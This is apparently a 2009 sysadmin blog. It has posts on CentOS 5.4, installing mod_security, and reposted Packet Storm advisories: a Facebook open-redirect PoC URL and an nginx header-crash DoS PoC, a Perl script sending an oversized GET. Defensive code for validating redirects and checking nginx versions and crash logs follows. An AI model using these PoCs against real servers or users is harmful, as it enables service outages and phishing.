Wednesday, October 28, 2009

Centos 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4. Major changes in CentOS 5 compared to CentOS 4 include:

These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8.

Better desktop support with compiz and AIGLX.

Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt.

Major changes compared to earlier CentOS 5 versions include:

KVM as a preview for the new virtualization technology in Enterprise Linux.

ext4 as a technology preview in file systems.

Source: www.centos.org

Download from a local IX mirror (Indonesia):

http://mirror.unej.ac.id/centos/5.4/isos/i386/

Monday, October 26, 2009

SQL injection and mod_security - black and white

This noon we read a mail from someone claiming he found an SQL injection in our site. How can it be...? Magic quotes are still off and mod_security is not yet installed.

See this article:

From: http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/

Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine

by Vivek Gite

How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server?

ModSecurity operates embedded in the web server (httpd), acting as a powerful umbrella that shields web applications from attacks. In order to use mod_security, you need to enable the EPEL repository under CentOS / RHEL Linux. Once the repo is enabled, type the following command to install ModSecurity:
# yum install mod_security
Sample output:

Loaded plugins: downloadonly, fastestmirror, priorities, protectbase
Loading mirror speeds from cached hostfile
* epel: www.gtlib.gatech.edu
* base: mirror.skiplink.com
* updates: centos.aol.com
* addons: mirror.cs.vt.edu
* extras: mirror.trouble-free.net
0 packages excluded due to repository protections
Setting up Install Process
Parsing package install arguments
Resolving Dependencies
--> Running transaction check
---> Package mod_security.x86_64 0:2.5.9-1.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size

Installing:
mod_security x86_64 2.5.9-1.el5 epel 935 k

Transaction Summary

Install 1 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 935 k
Is this ok [y/N]: y
Downloading Packages:
mod_security-2.5.9-1.el5.x86_64.rpm | 935 kB 00:00
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : mod_security [1/1]

Installed: mod_security.x86_64 0:2.5.9-1.el5
Complete!

mod_security configuration files

1. /etc/httpd/conf.d/mod_security.conf - main configuration file for the mod_security Apache module.
2. /etc/httpd/modsecurity.d/ - all other configuration files for the mod_security Apache module.
3. /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf - the configuration in this file should be customized for your specific requirements before deployment.
4. /var/log/httpd/modsec_debug.log - debug log; use its messages for debugging mod_security rules and other problems.
5. /var/log/httpd/modsec_audit.log - all requests that trigger a ModSecurity event or a server error are logged to this file (the "RelevantOnly" audit setting).

Open /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf file, enter:
# vi /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf
Make sure SecRuleEngine is set to "On" so the web server is protected against attacks:

SecRuleEngine On

Turn on other required options and policies as per your requirements. Finally, restart httpd:
# service httpd restart
Make sure everything is working:
# tail -f /var/log/httpd/error_log

Then check your log files in

/var/log/httpd/

modsec_debug.log
modsec_audit.log

Congratulations: Global Conference on Open Source (GCOS)

Sunday, October 25, 2009

Redirect and Phishing on Facebook

Tonight was very smooth; I just opened my eyes and read about security around the world. Facebook is the biggest social community, and people can make applications like games, quizzes, etc.

Can we phish that? ... Of course ...

Have you read this?

http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Facebook Redirection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# http://apps.facebook.com/quizzname/?next=[Redirection]
#
# [+] PoC :
#
# http://apps.facebook.com/quelendroitltwgzmv/?next=http://www.google.com
#
#[------------------------------------------------------------------------------------]

The "redirect method" can set the trap; be careful with your Facebook account.
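What the ?next= parameter above illustrates is an open redirect: the application sends the browser to whatever URL the parameter carries, so a phishing link can start at apps.facebook.com and end anywhere. The fix on the application side is to validate the target before redirecting. The function below is an added example written for this post, not code from Facebook or from the advisory; the allow-listed host name and the test vectors are constructed. It accepts only same-site paths or HTTPS URLs to an allow-listed host and falls back to a default for everything else, including the protocol-relative, backslash, userinfo and bare-scheme variants that commonly slip past naive checks.

```python
from urllib.parse import urlsplit

# Constructed allow-list: absolute redirect targets must be HTTPS to one of these hosts.
ALLOWED_HOSTS = {"apps.facebook.com"}

DEFAULT_TARGET = "/"


def safe_redirect_target(next_value, default=DEFAULT_TARGET):
    """Return next_value if it is a safe redirect target, otherwise the default.

    Accepted: a same-site absolute path ("/home.php?x=1") or an https URL whose
    netloc is exactly one of ALLOWED_HOSTS. Anything else is replaced by default.
    """
    if not next_value:
        return default
    candidate = next_value.strip()

    # Browsers normalise backslashes to slashes and tolerate embedded control
    # characters, so "/\evil.example" is really "//evil.example". Reject both.
    if "\\" in candidate or any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
        return default

    parts = urlsplit(candidate)

    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative ("//host") URL: only https to an allow-listed
        # host. Comparing the whole netloc also rejects "user@host" and "host:port".
        if parts.scheme.lower() != "https" or parts.netloc.lower() not in ALLOWED_HOSTS:
            return default
        return candidate

    # No scheme and no host: require a single-slash absolute path. "//x" was handled
    # above because urlsplit puts the host in netloc; "home.php" is rejected as well.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate


# Constructed test vectors: (next parameter as received, expected redirect target).
TEST_VECTORS = [
    ("/home.php?ref=quiz", "/home.php?ref=quiz"),                  # same-site path
    ("https://apps.facebook.com/quiz/", "https://apps.facebook.com/quiz/"),
    ("http://www.google.com", DEFAULT_TARGET),                      # the PoC pattern above
    ("//www.google.com", DEFAULT_TARGET),                           # protocol-relative
    ("/\\www.google.com", DEFAULT_TARGET),                          # backslash trick
    ("https://apps.facebook.com@evil.example/", DEFAULT_TARGET),    # userinfo trick
    ("https:evil.example", DEFAULT_TARGET),                         # scheme, no netloc
    ("javascript:alert(1)", DEFAULT_TARGET),                        # non-http scheme
    ("", DEFAULT_TARGET),
]


def run_vectors():
    """Return (input, got, expected) for every vector that does not behave as expected."""
    failures = []
    for next_value, expected in TEST_VECTORS:
        got = safe_redirect_target(next_value)
        if got != expected:
            failures.append((next_value, got, expected))
    return failures


if __name__ == "__main__":
    for next_value, _ in TEST_VECTORS:
        print(f"{next_value!r:48} -> {safe_redirect_target(next_value)!r}")
```

The strictness is deliberate: a redirect parameter almost never needs to carry a full URL, so requiring a relative path (with an explicit allow-list for the rare exception) removes the whole class of "looks like our domain" phishing links.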

Check your nginx:

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt

debian:~# uname -a
Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

In the nginx error log we can see:
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

Here is the same test on nginx compiled with debug symbols:

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000, flags=) at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2, data=0x0, name=0x808e46b "worker process", respawn=-2) at src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2) at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52
(gdb)

===============================

Tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0 <= 0.4.14

================================
Here is the PoC:

#!/usr/bin/perl
use IO::Socket;

if ($#ARGV != 0) {
    print "Usage: ./nginx.pl \n";
    exit;
}

# Connect to port 80 on the host given as the only argument; abort if the connection fails.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '80',
                              Proto    => 'tcp')
    or die "connect failed: $@\n";

# Request a 4079-byte URI; a fixed server answers it with a 400, as shown below.
$mysize = 4079;
$mymsg  = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

# Print whatever the server sends back.
while (<$sock>) {
    print;
}


I tried to check my nginx version; see this:

[root@vx066-findtoyou-cen ~]# rpm -qa | grep nginx
nginx-0.6.39-1.el5
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# perl nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:29:33 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
bash: ./nginx.pl: Permission denied
[root@vx066-findtoyou-cen ~]# chmod +x nginx.pl
[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:30:06 GMT
Content-Type: text/html
Content-Length: 173
Connection: close


And please check your nginx now :) .........
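Checking your nginx comes down to two things: whether the installed release falls inside the version ranges the advisory lists, and whether workers are dying on signal 11 the way the error_log line quoted above shows. The script below is an added example written for this post, not code from the advisory or from nginx. It parses the two version formats seen in the transcript ("Server: nginx/0.6.39" and the rpm -qa name "nginx-0.6.39-1.el5") and scans error_log lines for SIGSEGV worker exits. The sample log lines are constructed (the first copies the alert quoted above). It only knows the ranges the advisory names, so a release outside them is reported as "not listed" rather than as safe.

```python
import re
from collections import Counter

# Affected version ranges exactly as given in the advisory (inclusive on both ends).
AFFECTED_RANGES = [
    ((0, 7, 0), (0, 7, 61)),
    ((0, 6, 0), (0, 6, 38)),
    ((0, 5, 0), (0, 5, 37)),
    ((0, 4, 0), (0, 4, 14)),
]

# Matches "Server: nginx/0.6.39" (HTTP response header) and "nginx-0.6.39-1.el5" (rpm -qa).
VERSION_RE = re.compile(r"nginx[/-](\d+)\.(\d+)\.(\d+)")

# One nginx error_log line reporting that the master saw a worker exit on a signal.
WORKER_EXIT_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<level>\w+)\] (?P<master>\d+)#\d+: "
    r"worker process (?P<worker>\d+) exited on signal (?P<signal>\d+)"
)

# Constructed error_log sample; the first line copies the alert quoted in the advisory.
SAMPLE_ERROR_LOG = """\
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11
2009/10/15 01:53:24 [notice] 2477#0: start worker process 3590
2009/10/15 01:53:31 [alert] 2477#0: worker process 3590 exited on signal 11
2009/10/15 01:55:02 [error] 3591#0: *12 open() "/var/www/favicon.ico" failed (2: No such file or directory)
2009/10/15 02:10:44 [notice] 2477#0: signal 15 (SIGTERM) received, exiting
"""


def parse_nginx_version(text):
    """Extract (major, minor, patch) from a Server header or rpm package name; None if absent."""
    match = VERSION_RE.search(text)
    return tuple(int(part) for part in match.groups()) if match else None


def is_affected(version):
    """True when the version tuple lies inside one of the advisory's ranges."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def classify_version(text):
    """Return "affected", "not listed" or "unknown" for a Server header / rpm string."""
    version = parse_nginx_version(text)
    if version is None:
        return "unknown"
    return "affected" if is_affected(version) else "not listed"


def find_worker_crashes(log_text, signal=11):
    """Return (timestamp, worker pid) for each worker exit on the given signal (11 = SIGSEGV)."""
    crashes = []
    for line in log_text.splitlines():
        match = WORKER_EXIT_RE.match(line)
        if match and int(match.group("signal")) == signal:
            crashes.append((match.group("ts"), int(match.group("worker"))))
    return crashes


def crashes_per_minute(crashes):
    """Bucket crash timestamps by minute; a burst of SIGSEGV exits is the symptom to alert on."""
    return Counter(ts[:16] for ts, _ in crashes)


if __name__ == "__main__":
    for sample in ("Server: nginx/0.6.39", "nginx-0.6.39-1.el5", "Server: nginx/0.6.38"):
        print(f"{sample:26} -> {classify_version(sample)}")
    hits = find_worker_crashes(SAMPLE_ERROR_LOG)
    print(f"{len(hits)} worker SIGSEGV exit(s) by minute: {dict(crashes_per_minute(hits))}")
```

Feed the version check the output of rpm -qa | grep nginx (or the Server header from a request to your own host) and point the log scan at /var/log/nginx/error.log; repeated "exited on signal 11" alerts within a minute are what the crash above looks like from the master process's side.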